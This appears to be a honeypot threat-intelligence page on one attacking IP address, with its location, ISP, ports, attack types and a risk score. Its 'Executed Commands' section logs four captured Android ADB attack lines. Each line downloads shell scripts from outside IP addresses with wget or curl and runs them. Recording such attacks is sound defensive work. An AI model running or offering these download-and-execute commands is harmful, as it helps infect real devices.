Active Threat β’ HIGH
87.121.84.18
Country of OriginπΊπΈ United States
First Detection1/24/2026
Last Activity2/19/2026
ISPVpsvault.host Ltd
π―
124
Total Attacks
π
5
Ports
π‘
2
Attack Types
π¦
0
Malware
Geolocation
- Country
- πΊπΈ United States
- City
- New York
- ASN
- AS215925
- ISP
- Vpsvault.host Ltd
Attack Types
adbhoney
honeytrap
Attacked Ports
555512194180762252251822
Associated Malware
No associated malware
Executed Commands
$
cd /data/local/tmp/; busybox wget http://91.92.241.197:5124/2/w.sh; sh w.sh; curl http://91.92.241.197:5124/2/c.sh; sh c.sh; wget http://91.92.241.197:5124/2/wget.sh; sh wget.sh; curl http://91.92.241.197:5124/2/wget.sh; sh wget.sh; busybox wget http://91.92.241.197:5124/2/wget.sh; sh wget.sh; busybox curl http://91.92.241.197:5124/2/wget.sh; sh wget.sh25x$
cd /data/local/tmp/; busybox wget http://91.92.241.197:8080/bins/w.sh; sh w.sh; curl http://91.92.241.197:8080/bins/c.sh; sh c.sh; wget http://91.92.241.197:8080/bins/wget.sh; sh wget.sh; curl http://91.92.241.197:8080/bins/wget.sh; sh wget.sh; busybox wget http://91.92.241.197:8080/bins/wget.sh; sh wget.sh; busybox curl http://91.92.241.197:8080/bins/wget.sh; sh wget.sh7x$
cd /data/local/tmp/; busybox wget http://193.26.115.122/w.sh; sh w.sh; curl http://193.26.115.122/c.sh; sh c.sh; wget http://193.26.115.122/wget.sh; sh wget.sh; curl http://193.26.115.122/wget.sh; sh wget.sh; busybox wget http://193.26.115.122/wget.sh; sh wget.sh; busybox curl http://193.26.115.122/wget.sh; sh wget.sh4x$
cd /data/local/tmp/; busybox wget http://103.236.64.121/w.sh; sh w.sh; curl http://103.236.64.121/c.sh; sh c.sh; wget http://103.236.64.121/wget.sh; sh wget.sh; curl http://103.236.64.121/wget.sh; sh wget.sh; busybox wget http://103.236.64.121/wget.sh; sh wget.sh; busybox curl http://103.236.64.121/wget.sh; sh wget.sh1xRisk Assessment
60
/100
LowMediumHighCritical